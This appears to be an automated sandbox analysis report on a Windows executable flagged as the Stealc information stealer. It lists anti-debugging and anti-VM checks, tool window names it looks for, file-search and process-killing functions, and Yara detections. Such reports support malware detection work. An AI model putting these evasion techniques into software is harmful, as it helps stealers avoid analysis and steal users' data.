                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B8880 second address: 6B8885 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B8885 second address: 6B888B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B888B second address: 6B888F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B888F second address: 6B8895 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BBCFD second address: 6BBD19 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB418E85328h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BBD19 second address: 6BBD1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BB88C second address: 6BB8A4 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FB418E8531Eh 0x00000008 jng 00007FB418E85322h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E3579 second address: 5E358A instructions: 0x00000000 rdtsc 0x00000002 jo 00007FB418C0B12Ch 0x00000008 jns 00007FB418C0B126h 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E358A second address: 5E3594 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E3594 second address: 5E35B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FB418C0B138h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E35B6 second address: 5E35DC instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FB418E85316h 0x00000008 jmp 00007FB418E85329h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C6CAF second address: 6C6CB6 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6CE4F1 second address: 6CE50A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB418E85324h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D5592 second address: 6D5596 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D5596 second address: 6D55BE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jo 00007FB418E8531Eh 0x0000000e js 00007FB418E85316h 0x00000014 pushad 0x00000015 popad 0x00000016 jbe 00007FB418E8531Ch 0x0000001c popad 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 popad 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D67DF second address: 6D67E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DA646 second address: 6DA64A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F8D8E second address: 6F8D93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F8D93 second address: 6F8DB4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB418E8531Ch 0x00000009 jmp 00007FB418E85321h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F8DB4 second address: 6F8DCE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB418C0B130h 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70AE9B second address: 70AEA7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007FB418E85316h 0x0000000a push eax 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 709C68 second address: 709C9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push edx 0x00000010 pop edx 0x00000011 pushad 0x00000012 popad 0x00000013 push esi 0x00000014 pop esi 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FB418C0B138h 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 709C9A second address: 709CB8 instructions: 0x00000000 rdtsc 0x00000002 js 00007FB418E85316h 0x00000008 jmp 00007FB418E85324h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 709CB8 second address: 709CC1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70A24F second address: 70A263 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB418E85320h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70A57E second address: 70A598 instructions: 0x00000000 rdtsc 0x00000002 js 00007FB418C0B126h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FB418C0B12Ch 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70A598 second address: 70A5B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FB418E85329h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70C53C second address: 70C546 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FB418C0B126h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70C546 second address: 70C54F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70F169 second address: 70F171 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70F171 second address: 70F184 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FB418E85316h 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70F184 second address: 70F188 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70F188 second address: 70F19C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB418E85320h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70F19C second address: 70F1B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB418C0B134h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70F1B4 second address: 70F1EB instructions: 0x00000000 rdtsc 0x00000002 jng 00007FB418E85316h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d jmp 00007FB418E8531Dh 0x00000012 mov dh, 77h 0x00000014 push 00000004h 0x00000016 mov edx, dword ptr [ebp+122D3B32h] 0x0000001c call 00007FB418E85319h 0x00000021 jbe 00007FB418E85337h 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a popad 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70F1EB second address: 70F233 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB418C0B139h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FB418C0B12Ah 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 jmp 00007FB418C0B131h 0x00000018 mov eax, dword ptr [eax] 0x0000001a jl 00007FB418C0B141h 0x00000020 pushad 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70F233 second address: 70F261 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB418E85323h 0x00000009 popad 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FB418E8531Fh 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70F4EB second address: 70F50E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 jns 00007FB418C0B12Eh 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 pushad 0x00000013 je 00007FB418C0B12Ch 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70F50E second address: 70F522 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 pop edi 0x00000008 popad 0x00000009 mov eax, dword ptr [eax] 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jp 00007FB418E85316h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70F522 second address: 70F545 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB418C0B131h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e jl 00007FB418C0B12Eh 0x00000014 push eax 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 710BA3 second address: 710BA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 710BA9 second address: 710BBB instructions: 0x00000000 rdtsc 0x00000002 jne 00007FB418C0B126h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jnl 00007FB418C0B126h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 710BBB second address: 710BBF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 712B27 second address: 712B45 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB418C0B134h 0x00000007 jp 00007FB418C0B12Eh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 712B45 second address: 712B52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c pop edi 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 712B52 second address: 712B7E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FB418C0B12Dh 0x0000000d jmp 00007FB418C0B137h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DE052F second address: 4DE05A1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB418E85329h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b movzx eax, bx 0x0000000e popad 0x0000000f xchg eax, ebp 0x00000010 jmp 00007FB418E85325h 0x00000015 mov ebp, esp 0x00000017 jmp 00007FB418E8531Eh 0x0000001c pop ebp 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 pushfd 0x00000021 jmp 00007FB418E8531Dh 0x00000026 add ch, 00000006h 0x00000029 jmp 00007FB418E85321h 0x0000002e popfd 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DE05A1 second address: 4DE05A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DE05A6 second address: 4DE05B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB418E8531Ah 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DE05E4 second address: 4DE061B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB418C0B12Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FB418C0B136h 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FB418C0B12Eh 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DE061B second address: 4DE0642 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB418E8531Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FB418E85325h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DE0642 second address: 4DE06E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FB418C0B137h 0x00000009 adc si, 63BEh 0x0000000e jmp 00007FB418C0B139h 0x00000013 popfd 0x00000014 mov bl, ah 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 mov ebp, esp 0x0000001b pushad 0x0000001c pushfd 0x0000001d jmp 00007FB418C0B139h 0x00000022 sbb ax, 80A6h 0x00000027 jmp 00007FB418C0B131h 0x0000002c popfd 0x0000002d pushfd 0x0000002e jmp 00007FB418C0B130h 0x00000033 sub esi, 02CAD648h 0x00000039 jmp 00007FB418C0B12Bh 0x0000003e popfd 0x0000003f popad 0x00000040 pop ebp 0x00000041 push eax 0x00000042 push edx 0x00000043 push eax 0x00000044 push edx 0x00000045 push eax 0x00000046 push edx 0x00000047 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DE06E0 second address: 4DE06E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DE06E4 second address: 4DE06E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DE06E8 second address: 4DE06EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 633F3C second address: 633F42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Tries to evade debugger and weak emulator (self modifying code)
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 47DC34 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 47DD13 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 62576B instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 623E10 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 47B2C2 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 64AF17 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 62FC45 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeEvaded block: after key decisiongraph_0-38940
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001A40F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_001A40F0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0019E530 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0019E530
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00191710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00191710
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0019F7B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0019F7B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001A47C0 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_001A47C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001A3B00 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_001A3B00
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001A4B60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_001A4B60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0019DB80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0019DB80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0019EE20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0019EE20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0019BE40 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0019BE40
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0019DF10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0019DF10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00191160 GetSystemInfo,ExitProcess,0_2_00191160
                Source: file.exe, file.exe, 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.2062308102.0000000000E0E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.2062308102.0000000000E52000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2062308102.0000000000E85000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-37767
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-37755
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-37752
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-37807
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-37775
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-37640
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Hides threads from debuggers
                Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                Tries to detect sandboxes and other dynamic analysis tools (window names)
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00194610 VirtualProtect ?,00000004,00000100,000000000_2_00194610
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001A9BB0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_001A9BB0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001A9AA0 mov eax, dword ptr fs:[00000030h]0_2_001A9AA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001A7690 GetWindowsDirectoryA,GetVolumeInformationA,GetProcessHeap,RtlAllocateHeap,wsprintfA,0_2_001A7690
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Yara detected Powershell download and execute
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 1360, type: MEMORYSTR
                Searches for specific processes (likely to inject)
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001A9790 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_001A9790
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001A98E0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,CloseHandle,0_2_001A98E0
                Source: file.exe, file.exe, 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Program Manager
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001D7588 cpuid 0_2_001D7588
                Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_001A7D20
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001A7B10 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA,0_2_001A7B10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001A79E0 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_001A79E0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001A7BC0 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_001A7BC0

                Stealing of Sensitive Information

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.190000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2018399242.0000000004C60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2062308102.0000000000E0E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 1360, type: MEMORYSTR
